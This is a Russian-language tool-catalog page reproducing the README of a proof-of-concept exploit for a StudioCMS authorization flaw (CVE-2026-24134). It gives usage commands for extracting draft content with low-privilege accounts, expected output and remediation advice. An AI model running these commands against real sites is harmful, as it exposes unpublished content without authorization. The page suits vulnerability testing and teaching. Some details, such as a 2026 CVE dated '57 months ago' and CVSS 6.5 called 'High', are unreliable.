Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24134-PoC — Эксплойт proof-of-concept для CVE-2026-24134, уязвимости нарушения авторизации на уровне объектов (BOLA) в StudioCMS, демонстрирующий несанкционированный доступ к черновикам контента. | Kitploit
Инструменты/GitHubGitHub/filipegaudard/cve-2026-24134-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование безопасности APIТестирование на ПроникновениеОбучение и Образование
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

Эксплойт proof-of-concept для CVE-2026-24134, уязвимости нарушения авторизации на уровне объектов (BOLA) в StudioCMS, демонстрирующий несанкционированный доступ к черновикам контента.

Репозиторий
57 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24134-PoC

Обзор

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2026-24134 — уязвимости Broken Object Level Authorization (BOLA) в StudioCMS.

Содержимое

  • cve_2026_24134_poc.py — скрипт эксплуатации на Python

Предварительные требования

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

Быстрый старт

Ручная эксплуатация

root@kitploit:~
# Базовое использование
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Сохранение вывода в файл
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

Автоматизированное тестирование

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

Аргументы

Обязательные

  • -u, --url — базовый URL целевой StudioCMS
  • --uuid — UUID целевого черновика контента

Ручной режим

  • --username — имя пользователя для аутентификации
  • --password — пароль для аутентификации

Режим автоматизированного тестирования

  • --auto-test — включить автоматизированное тестирование
  • --visitor-user — имя пользователя учётной записи посетителя
  • --visitor-pass — пароль учётной записи посетителя
  • --editor-user — имя пользователя учётной записи редактора
  • --editor-pass — пароль учётной записи редактора

Необязательные

  • --save — сохранить содержимое ответа в файл
  • --no-ssl-verify — отключить проверку SSL-сертификата

Примеры сценариев

Сценарий 1: Проверка уязвимости системы

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

Ожидаемый вывод при наличии уязвимости:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

Ожидаемый вывод при наличии исправления:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

Сценарий 2: Извлечение черновика контента

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

Это сохранит полное содержимое черновика в draft_{uuid}.html.

Понимание вывода

Индикаторы успеха

  • [+] — успешная операция (зелёный)
  • [*] — информационное сообщение (синий)
  • [!] — предупреждение (жёлтый)
  • [-] — ошибка (красный)

HTTP-коды состояния

  • 200 OK — уязвимость присутствует! Доступ к черновику контента получен
  • 403 Forbidden — исправлено! Авторизация реализована корректно
  • 404 Not Found — неверный UUID или безопасная реализация (возвращает 404 вместо раскрытия существования)
  • 401 Unauthorized — ошибка аутентификации

Устранение уязвимости

Если вы используете уязвимую версию StudioCMS, немедленно обновитесь до исправленной версии.

Для разработчиков

Настоящая проблема: Проверки авторизации выполнялись на стороне клиента (JavaScript), а не на стороне сервера.

По словам команды разработчиков:

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

Исправление: Перенести авторизацию с клиента на сервер.

Ключевой принцип: Никогда не доверяйте клиенту. Безопасность на стороне клиента = улучшение UX. Безопасность на стороне сервера = реальная защита.

Правовое уведомление

ВАЖНО: Этот инструмент предоставляется исключительно для образовательных целей и санкционированного тестирования безопасности.

  • Используйте только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам незаконен в большинстве юрисдикций
  • Автор не несёт ответственности за неправомерное использование этого инструмента
  • Всегда соблюдайте практики ответственного раскрытия уязвимостей

Ссылки

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

Контакты

По вопросам об этом PoC или уязвимости:

  • Автор: Filipe Gaudard

Лицензия

Этот PoC выпущен в образовательных целях. Используйте ответственно и этично.

Скачать инструмент